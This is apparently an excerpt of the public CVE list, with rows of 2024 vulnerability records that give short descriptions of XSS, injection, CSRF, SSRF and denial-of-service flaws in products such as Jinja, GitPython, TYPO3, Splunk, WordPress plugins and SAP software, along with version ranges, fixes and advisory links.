CVE    2024    22196    Candidate    Nginx-UI provides online statistics for server indicators: monitor CPU usage, memory usage, load average, and disk usage in real-time. This issue may lead to information disclosure. By using `DefaultQuery`, the `"desc"` and `"id"` values are used as default values if the query parameters are not set. Thus, the `order` and `sort_by` query parameters are user-controlled and are being appended to the `order` variable without any sanitization. This issue has been patched in version 2.0.0.beta.9.    MISC:https://github.com/0xJacky/nginx-ui/commit/ec93ab05a3ecbb6bcf464d9dca48d74452df8a5b   |   URL:https://github.com/0xJacky/nginx-ui/commit/ec93ab05a3ecbb6bcf464d9dca48d74452df8a5b   |   MISC:https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-h374-mm57-879c   |   URL:https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-h374-mm57-879c    Assigned (20240108)
CVE    2024    22195    Candidate    Jinja is an extensible templating engine. Special placeholders in the template allow writing code similar to Python syntax. It is possible to inject arbitrary HTML attributes into the rendered HTML template, potentially leading to Cross-Site Scripting (XSS). The Jinja `xmlattr` filter can be abused to inject arbitrary HTML attribute keys and values, bypassing the auto escaping mechanism and potentially leading to XSS. It may also be possible to bypass attribute validation checks if they are blacklist-based.    FEDORA:FEDORA-2024-6026572e7d   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3/   |   FEDORA:FEDORA-2024-604e4c3509   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP/   |   FEDORA:FEDORA-2024-ab372beea4   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2/   |   MISC:https://github.com/pallets/jinja/releases/tag/3.1.3   |   URL:https://github.com/pallets/jinja/releases/tag/3.1.3   |   MISC:https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95   |   URL:https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95   |   MLIST:[debian-lts-announce] 20240123 [SECURITY] [DLA 3715-1] jinja2 security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html    Assigned (20240108)
CVE    2024    22194    Candidate    cdo-local-uuid project provides a specialized UUID-generating function that can, on user request, cause a program to generate deterministic UUIDs. An information leakage vulnerability is present in `cdo-local-uuid` at version `0.4.0`, and in `case-utils` in unpatched versions (matching the pattern `0.x.0`) at and since `0.5.0`, before `0.15.0`. The vulnerability stems from a Python function, `cdo_local_uuid.local_uuid()`, and its original implementation `case_utils.local_uuid()`.    MISC:https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235   |   URL:https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/commit/9e78f7cb1075728d0aafc918514f32a1392cd235   |   MISC:https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3   |   URL:https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/3   |   MISC:https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4   |   URL:https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/pull/4   |   MISC:https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882   |   URL:https://github.com/Cyber-Domain-Ontology/CDO-Utility-Local-UUID/security/advisories/GHSA-rgrf-6mf5-m882   |   MISC:https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9   |   URL:https://github.com/casework/CASE-Utilities-Python/commit/00864cd12de7c50d882dd1a74915d32e939c25f9   |   MISC:https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b   |   URL:https://github.com/casework/CASE-Utilities-Python/commit/1cccae8eb3cf94b3a28f6490efa0fbf5c82ebd6b   |   MISC:https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10   |   URL:https://github.com/casework/CASE-Utilities-Python/commit/5acb929dfb599709d1c8c90d1824dd79e0fd9e10   |   
MISC:https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790   |   URL:https://github.com/casework/CASE-Utilities-Python/commit/7e02d18383eabbeb9fb4ec97d81438c9980a4790   |   MISC:https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2   |   URL:https://github.com/casework/CASE-Utilities-Python/commit/80551f49241c874c7c50e14abe05c5017630dad2   |   MISC:https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5   |   URL:https://github.com/casework/CASE-Utilities-Python/commit/939775f956796d0432ecabbf62782ed7ad1007b5   |   MISC:https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d   |   URL:https://github.com/casework/CASE-Utilities-Python/commit/db428a0745dac4fdd888ced9c52f617695519f9d   |   MISC:https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1   |   URL:https://github.com/casework/CASE-Utilities-Python/commit/e4ffadc3d56fd303b8f465d727c4a58213d311a1   |   MISC:https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452   |   URL:https://github.com/casework/CASE-Utilities-Python/commit/fca7388f09feccd3b9ea88e6df9c7a43a5349452   |   MISC:https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509   |   URL:https://github.com/casework/CASE-Utilities-Python/commit/fdc32414eccfcbde6be0fd91b7f491cc0779b02d#diff-e60b9cb8fb480ed27283a030a0898be3475992d78228f4045b12ce5cbb2f0509    Assigned (20240108)
CVE    2024    22193    Candidate    The vantage6 technology enables managing and deploying privacy enhancing technologies like Federated Learning (FL) and Multi-Party Computation (MPC). There are no checks on whether the input is encrypted if a task is created in an encrypted collaboration. Therefore, a user may accidentally create a task with sensitive input data that will then be stored unencrypted in a database. Users should ensure they set the encryption setting correctly. This vulnerability is patched in 4.2.0.    MISC:https://github.com/vantage6/vantage6/commit/6383283733b81abfcacfec7538dc4dc882e98074   |   URL:https://github.com/vantage6/vantage6/commit/6383283733b81abfcacfec7538dc4dc882e98074   |   MISC:https://github.com/vantage6/vantage6/security/advisories/GHSA-rjmv-52mp-gjrr   |   URL:https://github.com/vantage6/vantage6/security/advisories/GHSA-rjmv-52mp-gjrr    Assigned (20240108)
CVE    2024    22192    Candidate    Ursa is a cryptographic library for use with blockchains. The revocation scheme that is part of the Ursa CL-Signatures implementations has a flaw that could impact the privacy guarantees defined by the AnonCreds verifiable credential model. Notably, a malicious verifier may be able to generate a unique identifier for a holder providing a verifiable presentation that includes a Non-Revocation proof. The impact of the flaw is that a malicious verifier may be able to determine a unique identifier for a holder presenting a Non-Revocation proof. Ursa has moved to end-of-life status and no fix is expected.    MISC:https://github.com/hyperledger-archives/ursa/security/advisories/GHSA-6698-mhxx-r84g   |   URL:https://github.com/hyperledger-archives/ursa/security/advisories/GHSA-6698-mhxx-r84g    Assigned (20240108)
CVE    2024    22191    Candidate    Avo is a framework to create admin panels for Ruby on Rails apps. A stored cross-site scripting (XSS) vulnerability was found in the key_value field of Avo v3.2.3 and v2.46.0. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser. The value of the key_value is inserted directly into the HTML code. In the current version of Avo (possibly also older versions), the value is not properly sanitized before it is inserted into the HTML code. This vulnerability could be used to steal sensitive information from victims that could be used to hijack victims' accounts or redirect them to malicious websites. Avo 3.2.4 and 2.47.0 include a fix for this issue. Users are advised to upgrade.    MISC:https://github.com/avo-hq/avo/commit/51bb80b181cd8e31744bdc4e7f9b501c81172347   |   URL:https://github.com/avo-hq/avo/commit/51bb80b181cd8e31744bdc4e7f9b501c81172347   |   MISC:https://github.com/avo-hq/avo/commit/fc92a05a8556b1787c8694643286a1afa6a71258   |   URL:https://github.com/avo-hq/avo/commit/fc92a05a8556b1787c8694643286a1afa6a71258   |   MISC:https://github.com/avo-hq/avo/security/advisories/GHSA-ghjv-mh6x-7q6h   |   URL:https://github.com/avo-hq/avo/security/advisories/GHSA-ghjv-mh6x-7q6h    Assigned (20240108)
CVE    2024    22190    Candidate    GitPython is a Python library used to interact with Git repositories. There is an incomplete fix for CVE-2023-40590. On Windows, GitPython uses an untrusted search path if it uses a shell to run `git`, as well as when it runs `bash.exe` to interpret hooks. If either of those features is used on Windows, a malicious `git.exe` or `bash.exe` may be run from an untrusted repository. This issue has been patched in version 3.1.41.    MISC:https://github.com/gitpython-developers/GitPython/commit/ef3192cc414f2fd9978908454f6fd95243784c7f   |   URL:https://github.com/gitpython-developers/GitPython/commit/ef3192cc414f2fd9978908454f6fd95243784c7f   |   MISC:https://github.com/gitpython-developers/GitPython/pull/1792   |   URL:https://github.com/gitpython-developers/GitPython/pull/1792   |   MISC:https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-2mqj-m65w-jghx   |   URL:https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-2mqj-m65w-jghx    Assigned (20240108)
CVE    2024    22188    Candidate    TYPO3 before 13.0.1 allows an authenticated admin user (with system maintainer privileges) to execute arbitrary shell commands (with the privileges of the web server) via a command injection vulnerability in form fields of the Install Tool. The fixed versions are 8.7.57 ELTS, 9.5.46 ELTS, 10.4.43 ELTS, 11.5.35 LTS, 12.4.11 LTS, and 13.0.1.    MISC:https://github.com/TYPO3/typo3/security/advisories/GHSA-5w2h-59j3-8x5w   |   MISC:https://typo3.org/help/security-advisories   |   MISC:https://typo3.org/security/advisory/typo3-core-sa-2024-002    Assigned (20240106)
CVE    2024    22182    Candidate    A remote, unauthenticated attacker may be able to send crafted messages to the web server of the Commend WS203VICM causing the system to restart, interrupting service.    MISC:https://clibrary-online.commend.com/en/cyber-security/security-advisories.html   |   URL:https://clibrary-online.commend.com/en/cyber-security/security-advisories.html   |   MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-051-01   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-051-01    Assigned (20240130)
CVE    2024    22167    Candidate    A potential DLL hijacking vulnerability in the SanDisk PrivateAccess application for Windows could lead to arbitrary code execution in the context of the system user. This vulnerability is only exploitable locally if an attacker has access to a copy of the user's vault or has already gained access into a user's system. This attack is limited to the system in context and cannot be propagated.    MISC:https://www.westerndigital.com/support/product-security/wdc-24002-sandisk-privateaccess-desktop-app-v-6-4-10   |   URL:https://www.westerndigital.com/support/product-security/wdc-24002-sandisk-privateaccess-desktop-app-v-6-4-10    Assigned (20240105)
CVE    2024    22165    Candidate    In Splunk Enterprise Security (ES) versions lower than 7.1.2, an attacker can create a malformed Investigation to perform a denial of service (DoS). The malformed investigation prevents the generation and rendering of the Investigations manager until it is deleted. The vulnerability requires an authenticated session and access to create an Investigation. It only affects the availability of the Investigations manager, but without the manager, the Investigations functionality becomes unusable for most users.    MISC:https://advisory.splunk.com/advisories/SVD-2024-0102   |   URL:https://advisory.splunk.com/advisories/SVD-2024-0102   |   MISC:https://research.splunk.com/application/7f6a07bd-82ef-46b8-8eba-802278abd00e/   |   URL:https://research.splunk.com/application/7f6a07bd-82ef-46b8-8eba-802278abd00e/    Assigned (20240105)
CVE    2024    22164    Candidate    In Splunk Enterprise Security (ES) versions below 7.1.2, an attacker can use investigation attachments to perform a denial of service (DoS) to the Investigation. The attachment endpoint does not properly limit the size of the request which lets an attacker cause the Investigation to become inaccessible.    MISC:https://advisory.splunk.com/advisories/SVD-2024-0101   |   URL:https://advisory.splunk.com/advisories/SVD-2024-0101   |   MISC:https://research.splunk.com/application/bb85b25e-2d6b-4e39-bd27-50db42edcb8f/   |   URL:https://research.splunk.com/application/bb85b25e-2d6b-4e39-bd27-50db42edcb8f/    Assigned (20240105)
CVE    2024    22163    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Shield Security Shield Security – Smart Bot Blocking & Intrusion Prevention Security allows Stored XSS. This issue affects Shield Security – Smart Bot Blocking & Intrusion Prevention Security: from n/a through 18.5.7.    MISC:https://patchstack.com/database/vulnerability/wp-simple-firewall/wordpress-shield-security-plugin-18-5-7-unauthenticated-stored-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-simple-firewall/wordpress-shield-security-plugin-18-5-7-unauthenticated-stored-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    22162    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPZOOM Shortcodes allows Reflected XSS. This issue affects WPZOOM Shortcodes: from n/a through 1.0.1.    MISC:https://patchstack.com/database/vulnerability/wpzoom-shortcodes/wordpress-wpzoom-shortcodes-plugin-1-0-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wpzoom-shortcodes/wordpress-wpzoom-shortcodes-plugin-1-0-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    22161    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Harmonic Design HD Quiz allows Stored XSS. This issue affects HD Quiz: from n/a through 1.8.11.    MISC:https://patchstack.com/database/vulnerability/hd-quiz/wordpress-hd-quiz-plugin-1-8-11-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/hd-quiz/wordpress-hd-quiz-plugin-1-8-11-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    22160    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bradley B. Dalina Image Tag Manager allows Reflected XSS. This issue affects Image Tag Manager: from n/a through 1.5.    MISC:https://patchstack.com/database/vulnerability/image-tag-manager/wordpress-image-tag-manager-plugin-1-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/image-tag-manager/wordpress-image-tag-manager-plugin-1-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    2216    Candidate    A missing permission check in an HTTP endpoint in Jenkins docker-build-step Plugin 2.11 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified TCP or Unix socket URL, and to reconfigure the plugin using the provided connection test parameters, affecting future build step executions.    MISC:Jenkins Security Advisory 2024-03-06   |   URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3200    Assigned (20240306)
CVE    2024    22159    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in realmag777 WOLF – WordPress Posts Bulk Editor and Manager Professional allows Reflected XSS. This issue affects WOLF – WordPress Posts Bulk Editor and Manager Professional: from n/a through 1.0.8.    MISC:https://patchstack.com/database/vulnerability/bulk-editor/wordpress-wolf-wordpress-posts-bulk-editor-and-manager-professional-plugin-1-0-8-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/bulk-editor/wordpress-wolf-wordpress-posts-bulk-editor-and-manager-professional-plugin-1-0-8-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    22158    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PeepSo Community by PeepSo – Social Network, Membership, Registration, User Profiles allows Stored XSS. This issue affects Community by PeepSo – Social Network, Membership, Registration, User Profiles: from n/a before 6.3.1.0.    MISC:https://patchstack.com/database/vulnerability/peepso-photos/wordpress-peepso-photos-add-on-plugin-6-3-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/peepso-photos/wordpress-peepso-photos-add-on-plugin-6-3-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    22156    Candidate    Missing Authorization vulnerability in SNP Digital SalesKing. This issue affects SalesKing: from n/a through 1.6.15.    MISC:https://patchstack.com/database/vulnerability/salesking/wordpress-salesking-plugin-1-6-15-unauthenticated-plugin-settings-change-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/salesking/wordpress-salesking-plugin-1-6-15-unauthenticated-plugin-settings-change-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    22154    Candidate    Exposure of Sensitive Information to an Unauthorized Actor vulnerability in SNP Digital SalesKing. This issue affects SalesKing: from n/a through 1.6.15.    MISC:https://patchstack.com/database/vulnerability/salesking/wordpress-salesking-plugin-1-6-15-unauthenticated-sensitive-data-exposure-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/salesking/wordpress-salesking-plugin-1-6-15-unauthenticated-sensitive-data-exposure-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    22153    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fahad Mahmood & Alexandre Faustino Stock Locations for WooCommerce allows Stored XSS. This issue affects Stock Locations for WooCommerce: from n/a through 2.5.9.    MISC:https://patchstack.com/database/vulnerability/stock-locations-for-woocommerce/wordpress-stock-locations-for-woocommerce-plugin-2-5-9-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/stock-locations-for-woocommerce/wordpress-stock-locations-for-woocommerce-plugin-2-5-9-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    22152    Candidate    Unrestricted Upload of File with Dangerous Type vulnerability in WebToffee Product Import Export for WooCommerce. This issue affects Product Import Export for WooCommerce: from n/a through 2.3.7.    MISC:https://patchstack.com/database/vulnerability/product-import-export-for-woo/wordpress-product-import-export-for-woocommerce-plugin-2-3-7-arbitrary-file-upload-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/product-import-export-for-woo/wordpress-product-import-export-for-woocommerce-plugin-2-3-7-arbitrary-file-upload-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    22150    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PWR Plugins Portfolio & Image Gallery for WordPress | PowerFolio allows Stored XSS. This issue affects Portfolio & Image Gallery for WordPress | PowerFolio: from n/a through 3.1.    MISC:https://patchstack.com/database/vulnerability/portfolio-elementor/wordpress-powerfolio-plugin-3-1-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/portfolio-elementor/wordpress-powerfolio-plugin-3-1-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    2215    Candidate    A cross-site request forgery (CSRF) vulnerability in Jenkins docker-build-step Plugin 2.11 and earlier allows attackers to connect to an attacker-specified TCP or Unix socket URL, and to reconfigure the plugin using the provided connection test parameters, affecting future build step executions.    MISC:Jenkins Security Advisory 2024-03-06   |   URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3200    Assigned (20240306)
CVE    2024    22148    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Smart Editor JoomUnited allows Reflected XSS. This issue affects JoomUnited: from n/a through 1.3.3.    MISC:https://patchstack.com/database/vulnerability/wp-smart-editor/wordpress-wp-smart-editor-plugin-1-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-smart-editor/wordpress-wp-smart-editor-plugin-1-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    22147    Candidate    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WP Overnight PDF Invoices & Packing Slips for WooCommerce. This issue affects PDF Invoices & Packing Slips for WooCommerce: from n/a through 3.7.5.    MISC:https://patchstack.com/database/vulnerability/woocommerce-pdf-invoices-packing-slips/wordpress-pdf-invoices-packing-slips-for-woocommerce-plugin-3-7-5-sql-injection-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/woocommerce-pdf-invoices-packing-slips/wordpress-pdf-invoices-packing-slips-for-woocommerce-plugin-3-7-5-sql-injection-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    22146    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Magazine3 Schema & Structured Data for WP & AMP allows Stored XSS. This issue affects Schema & Structured Data for WP & AMP: from n/a through 1.25.    MISC:https://patchstack.com/database/vulnerability/schema-and-structured-data-for-wp/wordpress-schema-structured-data-for-wp-amp-plugin-1-25-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/schema-and-structured-data-for-wp/wordpress-schema-structured-data-for-wp-amp-plugin-1-25-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    22143    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in WP Spell Check. This issue affects WP Spell Check: from n/a through 9.17.    MISC:https://patchstack.com/database/vulnerability/wp-spell-check/wordpress-wp-spell-check-plugin-9-17-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-spell-check/wordpress-wp-spell-check-plugin-9-17-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    22142    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Cozmoslabs Profile Builder Pro allows Reflected XSS. This issue affects Profile Builder Pro: from n/a through 3.10.0.    MISC:https://patchstack.com/database/vulnerability/profile-builder-pro/wordpress-profile-builder-pro-plugin-3-10-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/profile-builder-pro/wordpress-profile-builder-pro-plugin-3-10-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    22141    Candidate    Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Cozmoslabs Profile Builder Pro. This issue affects Profile Builder Pro: from n/a through 3.10.0.    MISC:https://patchstack.com/database/vulnerability/profile-builder-pro/wordpress-profile-builder-pro-plugin-3-10-0-totp-secret-key-exposure-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/profile-builder-pro/wordpress-profile-builder-pro-plugin-3-10-0-totp-secret-key-exposure-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    22140    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs Profile Builder Pro. This issue affects Profile Builder Pro: from n/a through 3.10.0.    MISC:https://patchstack.com/database/vulnerability/profile-builder-pro/wordpress-profile-builder-pro-plugin-3-10-0-csrf-leading-to-account-takeover-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/profile-builder-pro/wordpress-profile-builder-pro-plugin-3-10-0-csrf-leading-to-account-takeover-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    22137    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MailMunch Constant Contact Forms by MailMunch allows Stored XSS. This issue affects Constant Contact Forms by MailMunch: from n/a through 2.0.11.    MISC:https://patchstack.com/database/vulnerability/constant-contact-forms-by-mailmunch/wordpress-constant-contact-forms-by-mailmunch-plugin-2-0-11-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/constant-contact-forms-by-mailmunch/wordpress-constant-contact-forms-by-mailmunch-plugin-2-0-11-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    22136    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in DroitThemes Droit Elementor Addons – Widgets, Blocks, Templates Library For Elementor Builder. This issue affects Droit Elementor Addons – Widgets, Blocks, Templates Library For Elementor Builder: from n/a through 3.1.5.    MISC:https://patchstack.com/database/vulnerability/droit-elementor-addons/wordpress-droit-elementor-addons-plugin-3-1-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/droit-elementor-addons/wordpress-droit-elementor-addons-plugin-3-1-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    22135    Candidate    Unrestricted Upload of File with Dangerous Type vulnerability in WebToffee Order Export & Order Import for WooCommerce. This issue affects Order Export & Order Import for WooCommerce: from n/a through 2.4.3.    MISC:https://patchstack.com/database/vulnerability/order-import-export-for-woocommerce/wordpress-order-export-order-import-for-woocommerce-plugin-2-4-3-arbitrary-file-upload-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/order-import-export-for-woocommerce/wordpress-order-export-order-import-for-woocommerce-plugin-2-4-3-arbitrary-file-upload-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    22134    Candidate    Server-Side Request Forgery (SSRF) vulnerability in Renzo Johnson Contact Form 7 Extension For Mailchimp. This issue affects Contact Form 7 Extension For Mailchimp: from n/a through 0.5.70.    MISC:https://patchstack.com/database/vulnerability/contact-form-7-mailchimp-extension/wordpress-contact-form-7-extension-for-mailchimp-plugin-0-5-70-server-side-request-forgery-ssrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/contact-form-7-mailchimp-extension/wordpress-contact-form-7-extension-for-mailchimp-plugin-0-5-70-server-side-request-forgery-ssrf-vulnerability?_s_id=cve    Assigned (20240105)
CVE    2024    22133    Candidate    SAP Fiori Front End Server - version 605, allows altering of approver details on the read-only field when sending leave request information. This could lead to creation of request with incorrect approver causing low impact on Confidentiality and Integrity with no impact on Availability of the application.    MISC:https://me.sap.com/notes/3417399   |   URL:https://me.sap.com/notes/3417399   |   MISC:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364   |   URL:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364    Assigned (20240105)
CVE    2024    22132    Candidate    SAP IDES ECC-systems contain code that permits the execution of arbitrary program code of user's choice. An attacker can therefore control the behaviour of the system by executing malicious code which can potentially escalate privileges with low impact on confidentiality, integrity and availability of the system.    MISC:https://me.sap.com/notes/3421659   |   URL:https://me.sap.com/notes/3421659   |   MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html   |   URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html    Assigned (20240105)
CVE    2024    22131    Candidate    In SAP ABA (Application Basis) - versions 700, 701, 702, 731, 740, 750, 751, 752, 75C, 75I, an attacker authenticated as a user with a remote execution authorization can use a vulnerable interface. This allows the attacker to use the interface to invoke an application function to perform actions which they would not normally be permitted to perform. Depending on the function executed, the attack can read or modify any user/business data and can make the entire system unavailable.    MISC:https://me.sap.com/notes/3420923   |   URL:https://me.sap.com/notes/3420923   |   MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html   |   URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html    Assigned (20240105)
CVE    2024    22130    Candidate    Print preview option in SAP CRM WebClient UI - versions S4FND 102, S4FND 103, S4FND 104, S4FND 105, S4FND 106, S4FND 107, S4FND 108, WEBCUIF 700, WEBCUIF 701, WEBCUIF 730, WEBCUIF 731, WEBCUIF 746, WEBCUIF 747, WEBCUIF 748, WEBCUIF 800, WEBCUIF 801, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting vulnerability. An attacker with low privileges can cause limited impact to confidentiality and integrity of the application data after successful exploitation.    MISC:https://me.sap.com/notes/3410875   |   URL:https://me.sap.com/notes/3410875   |   MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html   |   URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html    Assigned (20240105)
CVE    2024    22129    Candidate    SAP Companion - version <3.1.38, has a URL with parameter that could be vulnerable to XSS attack. The attacker could send a malicious link to a user that would possibly allow an attacker to retrieve the sensitive information and cause minor impact on the integrity of the web application.    MISC:https://me.sap.com/notes/3404025   |   URL:https://me.sap.com/notes/3404025   |   MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html   |   URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html    Assigned (20240105)
CVE    2024    22128    Candidate    SAP NWBC for HTML - versions SAP_UI 754, SAP_UI 755, SAP_UI 756, SAP_UI 757, SAP_UI 758, SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. An unauthenticated attacker can inject malicious javascript to cause limited impact to confidentiality and integrity of the application data after successful exploitation.    MISC:https://me.sap.com/notes/3396109   |   URL:https://me.sap.com/notes/3396109   |   MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html   |   URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html    Assigned (20240105)
CVE    2024    22127    Candidate    SAP NetWeaver Administrator AS Java (Administrator Log Viewer plug-in) - version 7.50, allows an attacker with high privileges to upload potentially dangerous files which leads to command injection vulnerability. This would enable the attacker to run commands which can cause high impact on confidentiality, integrity and availability of the application.    MISC:https://me.sap.com/notes/3433192   |   URL:https://me.sap.com/notes/3433192   |   MISC:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364   |   URL:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364    Assigned (20240105)
